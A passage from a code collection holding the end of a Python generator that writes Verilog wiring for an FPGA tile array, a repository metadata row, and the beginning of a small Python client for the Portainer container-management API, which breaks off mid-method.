line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
# different sides on IOs
if this_tile.y_cor == y_size + 1:
i_end_index = this_tile.x_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.x_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(top_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(top_out[' + str(o_end_index) + ':' + str(o_start_index) + ']),\n'
if this_tile.y_cor == 0:
i_end_index = this_tile.x_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.x_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(bot_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(bot_out[' + str(o_end_index) + ':' + str(o_start_index) + ']),\n'  # was i_end_index/i_start_index; the o_* indices computed above went unused (likely copy-paste slip)
if this_tile.x_cor == 0:
i_end_index = this_tile.y_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.y_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(left_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(left_out[' + str(o_end_index) + ':' + str(o_start_index) + ']),\n'  # was i_end_index/i_start_index; same slip as the bot_out case
if this_tile.x_cor == x_size + 1:
i_end_index = this_tile.y_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.y_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(right_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(right_out[' + str(o_end_index) + ':' + str(o_start_index) + ']),\n'  # was i_end_index/i_start_index; same slip as the bot_out case
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
line_to_print = '\n\n // FPGA LUT TILES DECLARE\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = 0
for y_cor in range (0, y_size):
x_cor = 0
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = edge_param_count + 1
for y_cor in range (0, y_size):
x_cor = x_size - 1
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = edge_param_count + 1
    # bottom edge of lut tile (y_cor == 0)
    for x_cor in range(1, x_size - 1):
        y_cor = 0
        this_tile = fpga_lut_tile[y_cor][x_cor]
        tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
        this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
        this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
        this_tile_config_in_range_low = 32*this_tile.x_cor
        line_to_print = ''
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
        fpga_tile_fp.write(line_to_print)
        line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
        line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
        line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
        line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
        line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
        line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
        line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
        line_to_print = line_to_print + ' .io_x_loc(),\n'
        line_to_print = line_to_print + ' .io_y_loc(),\n'
        line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
        line_to_print = line_to_print + ' .clk(clock),\n'
        line_to_print = line_to_print + ' .reset(rst)\n'
        line_to_print = line_to_print + ' );\n\n'
        fpga_tile_fp.write(line_to_print)
        edge_param_count = edge_param_count + 1
    # top edge of lut tile (y_cor == y_size - 1)
    for x_cor in range(1, x_size - 1):
        y_cor = y_size - 1
        this_tile = fpga_lut_tile[y_cor][x_cor]
        tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
        this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
        this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
        this_tile_config_in_range_low = 32*this_tile.x_cor
        line_to_print = ''
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
        line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
        fpga_tile_fp.write(line_to_print)
        line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
        line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
        line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
        line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
        line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
        line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
        line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
        line_to_print = line_to_print + ' .io_x_loc(),\n'
        line_to_print = line_to_print + ' .io_y_loc(),\n'
        line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
        line_to_print = line_to_print + ' .clk(clock),\n'
        line_to_print = line_to_print + ' .reset(rst)\n'
        line_to_print = line_to_print + ' );\n\n'
        fpga_tile_fp.write(line_to_print)
        edge_param_count = edge_param_count + 1
    # center of lut tile
    for y_cor in range(1, y_size - 1):
        for x_cor in range(1, x_size - 1):
            this_tile = fpga_lut_tile[y_cor][x_cor]
            tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
            this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
            this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
            this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
            this_tile_config_in_range_low = 32*this_tile.x_cor
            line_to_print = ''
            line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
            line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
            line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
            line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
            fpga_tile_fp.write(line_to_print)
            line_to_print = ' lut_tile' + ' ' + tile_name + '(\n'
            line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
            line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
            line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
            line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
            line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
            line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
            line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
            line_to_print = line_to_print + ' .clk(clock),\n'
            line_to_print = line_to_print + ' .reset(rst)\n'
            line_to_print = line_to_print + ' );\n\n'
            fpga_tile_fp.write(line_to_print)
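
# For a center tile at (y_cor, x_cor) = (2, 3), the loop above emits Verilog of
# roughly this shape (the bracketed width W depends on the tile's channel and
# pin counts, so the values here are illustrative only):
#
#    wire [W:0] lut_tile_2_3_chanxy_in;
#    lut_tile lut_tile_2_3(
#      .io_chanxy_in(lut_tile_2_3_chanxy_in),
#      ...
#      .reset(rst)
#    );
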
def generate_fpga_tile_declare(fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size):
    line_to_print = '\n\n // FPGA IO TILES DECLARE\n'
    fpga_tile_fp.write(line_to_print)
    for i in range(0, len(fpga_io_tile)):
        this_tile = fpga_io_tile[i]
        line_to_print = ' val io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        if this_tile.num_chanxy_out == 0:
            line_to_print = line_to_print + ' = new io_tile_wo_chanxy (io_tile_param_list(' + str(i) + '))\n'
        else:
            line_to_print = line_to_print + ' = new io_tile (io_tile_param_list(' + str(i) + '))\n'
        fpga_tile_fp.write(line_to_print)
    edge_param_count = 0
    line_to_print = '\n\n // FPGA LUT TILES DECLARE\n'
    fpga_tile_fp.write(line_to_print)
    # left edge (x_cor == 0)
    for y_cor in range(0, y_size):
        x_cor = 0
        this_tile = fpga_lut_tile[y_cor][x_cor]
        line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
        edge_param_count = edge_param_count + 1
        fpga_tile_fp.write(line_to_print)
    # right edge (x_cor == x_size - 1)
    for y_cor in range(0, y_size):
        x_cor = x_size - 1
        this_tile = fpga_lut_tile[y_cor][x_cor]
        line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
        edge_param_count = edge_param_count + 1
        fpga_tile_fp.write(line_to_print)
    # bottom edge (y_cor == 0)
    for x_cor in range(1, x_size - 1):
        y_cor = 0
        this_tile = fpga_lut_tile[y_cor][x_cor]
        line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
        edge_param_count = edge_param_count + 1
        fpga_tile_fp.write(line_to_print)
    # top edge (y_cor == y_size - 1)
    for x_cor in range(1, x_size - 1):
        y_cor = y_size - 1
        this_tile = fpga_lut_tile[y_cor][x_cor]
        line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
        line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
        edge_param_count = edge_param_count + 1
        fpga_tile_fp.write(line_to_print)
    # center of lut tile
    for y_cor in range(1, y_size - 1):
        for x_cor in range(1, x_size - 1):
            this_tile = fpga_lut_tile[y_cor][x_cor]
            line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
            line_to_print = line_to_print + ' = new lut_tile\n'
            fpga_tile_fp.write(line_to_print)
def generate_fpga_io_conn(fpga_tile_fp, fpga_io_tile, x_size, y_size):
    _per_io_in = fpga_io_tile[0].num_opin
    _per_io_out = fpga_io_tile[0].num_ipin
    line_to_print = '\n\n // IO CONN\n'
    fpga_tile_fp.write(line_to_print)
    # top
    out_line_to_print = ' io.top_out := ' + 'Cat('
    y_cor = y_size + 1
    for x_cor in range(1, x_size + 1):
        tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
        out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
        line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.top_in(' + str(x_cor*_per_io_out - 1) + ', ' + str((x_cor-1)*_per_io_out) + ')\n'
        fpga_tile_fp.write(line_to_print)
    out_line_to_print = out_line_to_print[:-1] + ')\n'
    fpga_tile_fp.write(out_line_to_print)
    # bot
    out_line_to_print = ' io.bot_out := ' + 'Cat('
    y_cor = 0
    for x_cor in range(1, x_size + 1):
        tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
        out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
        line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.bot_in(' + str(x_cor*_per_io_out - 1) + ', ' + str((x_cor-1)*_per_io_out) + ')\n'
        fpga_tile_fp.write(line_to_print)
    out_line_to_print = out_line_to_print[:-1] + ')\n'
    fpga_tile_fp.write(out_line_to_print)
    # left
    out_line_to_print = ' io.left_out := ' + 'Cat('
    x_cor = 0
    for y_cor in range(1, y_size + 1):
        tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
        out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
        line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.left_in(' + str(y_cor*_per_io_out - 1) + ', ' + str((y_cor-1)*_per_io_out) + ')\n'
        fpga_tile_fp.write(line_to_print)
    out_line_to_print = out_line_to_print[:-1] + ')\n'
    fpga_tile_fp.write(out_line_to_print)
    # right
    out_line_to_print = ' io.right_out := ' + 'Cat('
    x_cor = x_size + 1
    for y_cor in range(1, y_size + 1):
        tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
        out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
        line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.right_in(' + str(y_cor*_per_io_out - 1) + ', ' + str((y_cor-1)*_per_io_out) + ')\n'
        fpga_tile_fp.write(line_to_print)
    out_line_to_print = out_line_to_print[:-1] + ')\n'
    fpga_tile_fp.write(out_line_to_print)
    line_to_print = '\n\n'
    fpga_tile_fp.write(line_to_print)
def generate_tile_configs_en(fpga_tile_fp, fpga_config_depth, fpga_config_start_index, x_size, y_size):
    line_to_print = '\n\n // FPGA CONFIG EN\n'
    fpga_tile_fp.write(line_to_print)
    # Edge
    for y_cor in range(1, y_size + 1):
        x_cor = 0
        _start_index = fpga_config_start_index[y_cor]
        _end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
        line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
        fpga_tile_fp.write(line_to_print)
    for y_cor in range(1, y_size + 1):
        x_cor = x_size + 1
        _start_index = fpga_config_start_index[y_cor]
        _end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
        line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
        fpga_tile_fp.write(line_to_print)
    for x_cor in range(1, x_size + 1):
        y_cor = 0
        _start_index = fpga_config_start_index[y_cor]
        _end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
        line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
        fpga_tile_fp.write(line_to_print)
    for x_cor in range(1, x_size + 1):
        y_cor = y_size + 1
        _start_index = fpga_config_start_index[y_cor]
        _end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
        line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
        fpga_tile_fp.write(line_to_print)
    # Lut Tile
    for y_cor in range(1, y_size + 1):
        for x_cor in range(1, x_size + 1):
            _start_index = fpga_config_start_index[y_cor]
            _end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
            line_to_print = ' lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
            fpga_tile_fp.write(line_to_print)
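
# For example, with fpga_config_start_index[1] == 0 and fpga_config_depth[1][0] == 32
# (illustrative values), the first edge loop above emits:
#
#    io_tile_1_0.io.configs_en := io.configs_en(31, 0)
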
def generate_verilog_fpga_tile(fpga_route, fpga_config_depth, fpga_config_start_index, fpga_lut_tile, fpga_io_tile, x_size, y_size, num_io_ipin, num_io_opin, num_config_depth, const_node_count):
    # open file for writing
    fpga_tile_filename = 'gen_src/fpga.v'
    fpga_tile_fp = open(fpga_tile_filename, 'w')
    if x_size == y_size:
        generate_verilog_fpga_header(fpga_tile_fp, num_io_ipin*x_size, num_io_opin*x_size, 32*(x_size+2), num_config_depth)
        generate_verilog_wires(fpga_tile_fp, fpga_route, const_node_count)
        generate_verilog_fpga_tile_declare(fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size, fpga_config_depth, fpga_config_start_index)
        generate_verilog_lut_tile_ipin(fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
        generate_verilog_lut_tile_opin(fpga_tile_fp, fpga_lut_tile, x_size, y_size)
        generate_verilog_lut_tile_chanxy(fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
        generate_verilog_io_tile_ipin(fpga_tile_fp, fpga_io_tile, fpga_route)
        generate_verilog_io_tile_opin(fpga_tile_fp, fpga_io_tile)
        generate_verilog_io_tile_chanxy(fpga_tile_fp, fpga_io_tile, fpga_route)
    else:
        print('WARNING: CHIP IS NOT IN SQUARE SHAPE')
    # close file
    fpga_tile_fp.write('endmodule\n')
    fpga_tile_fp.close()
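
# A hypothetical invocation sketch (the real caller builds fpga_route, the tile
# grids, and the config-depth tables elsewhere in this generator; the sizes and
# pin counts below are placeholders):
#
#   generate_verilog_fpga_tile(fpga_route, fpga_config_depth, fpga_config_start_index,
#                              fpga_lut_tile, fpga_io_tile, x_size=4, y_size=4,
#                              num_io_ipin=8, num_io_opin=8,
#                              num_config_depth=num_config_depth, const_node_count=2)
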
#def generate_scala_fpga_tile(fpga_route, fpga_config_depth, fpga_config_start_index, fpga_lut_tile, fpga_io_tile, x_size, y_size, const_node_count):
#
#    # open file for writing
#    fpga_tile_filename = 'gen_src/fpga.scala'
#    fpga_tile_fp = open(fpga_tile_filename, 'w')
#
#    generate_fpga_tile_declare(fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size)
#    generate_wires(fpga_tile_fp, fpga_route, const_node_count)
#    generate_fpga_tile_ff_en(fpga_tile_fp, x_size, y_size)
#    generate_lut_tile_ipin(fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
#    generate_lut_tile_chanxy(fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
#    generate_fpga_configs_in(fpga_tile_fp, x_size, y_size)
#    generate_fpga_io_conn(fpga_tile_fp, fpga_io_tile, x_size, y_size)
#    generate_io_tile_chanxy(fpga_tile_fp, fpga_io_tile, fpga_route)
#    generate_io_tile_ipin(fpga_tile_fp, fpga_io_tile, fpga_route)
#    generate_io_tile_opin(fpga_tile_fp, fpga_io_tile)
#    generate_lut_tile_opin(fpga_tile_fp, fpga_lut_tile, x_size, y_size)
#    generate_tile_configs_en(fpga_tile_fp, fpga_config_depth, fpga_config_start_index, x_size, y_size)
#
#    # close file
#    fpga_tile_fp.write('\n}\n')
#    fpga_tile_fp.close()
| 51.07871 | 197 | 0.626383 | 6,433 | 39,586 | 3.341676 | 0.01912 | 0.117784 | 0.215937 | 0.113039 | 0.961716 | 0.952458 | 0.944876 | 0.939108 | 0.928316 | 0.918686 | 0 | 0.011685 | 0.247689 | 39,586 | 774 | 198 | 51.144703 | 0.710151 | 0.035113 | 0 | 0.75619 | 1 | 0 | 0.162749 | 0.01389 | 0.017143 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.007619 | null | null | 0.52 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
e541a22589e2e52e2adfb1e745377003aba63ba8 | 4,951 | py | Python | pyportainer/pyportainer.py | sirmmo/pyportainer | 626da406cdc3c1f1d22bd98170b3c26cfc58d594 | [
"MIT"
] | 2 | 2018-04-24T22:48:49.000Z | 2021-03-25T20:05:10.000Z | pyportainer/pyportainer.py | sirmmo/pyportainer | 626da406cdc3c1f1d22bd98170b3c26cfc58d594 | [
"MIT"
] | 1 | 2018-07-02T13:58:49.000Z | 2018-07-02T15:57:50.000Z | pyportainer/pyportainer.py | sirmmo/pyportainer | 626da406cdc3c1f1d22bd98170b3c26cfc58d594 | [
"MIT"
] | 2 | 2019-09-19T23:28:35.000Z | 2020-04-20T19:44:46.000Z | import json
import requests
class PyPortainer():
    def __init__(self, portainer_endpoint, verifySSL=True):
        self.portainer_endpoint = portainer_endpoint + "/api"
        self.verifySSL = verifySSL

    def login(self, username, password):
        r = requests.post(
            self.portainer_endpoint + "/auth",
            data=json.dumps({"Username": username, "Password": password}),
            verify=self.verifySSL)
        j = r.json()
        self.token = j.get("jwt")

    def get_dockerhub_info(self):
        r = requests.get(
            self.portainer_endpoint + "/dockerhub",
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def put_dockerhub_info(self, options):
        r = requests.put(
            self.portainer_endpoint + "/dockerhub",
            data=json.dumps(options),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def get_status(self):
        r = requests.get(
            self.portainer_endpoint + "/status",
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def get_endpoints(self):
        r = requests.get(
            self.portainer_endpoint + "/endpoints",
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def new_endpoint(self, options):
        r = requests.post(
            self.portainer_endpoint + "/endpoints",
            data=json.dumps(options),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def get_endpoint(self, identifier):
        r = requests.get(
            self.portainer_endpoint + "/endpoints/{}".format(identifier),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def update_endpoint(self, identifier, options):
        r = requests.put(
            self.portainer_endpoint + "/endpoints/{}".format(identifier),
            data=json.dumps(options),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def delete_endpoint(self, identifier):
        r = requests.delete(
            self.portainer_endpoint + "/endpoints/{}".format(identifier),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def access_endpoint(self, identifier, options):
        r = requests.put(
            self.portainer_endpoint + "/endpoints/{}/access".format(identifier),
            data=json.dumps(options),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def get_stacks(self, endpoint):
        r = requests.get(
            self.portainer_endpoint + "/endpoints/{}/stacks".format(endpoint),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def new_stack(self, endpoint, options):
        r = requests.post(
            self.portainer_endpoint + "/endpoints/{}/stacks".format(endpoint),
            data=json.dumps(options),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def get_stack(self, endpoint, stack):
        r = requests.get(
            self.portainer_endpoint + "/endpoints/{}/stacks/{}".format(endpoint, stack),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def update_stack(self, endpoint, stack, options):
        # send the updated stack definition as the request body
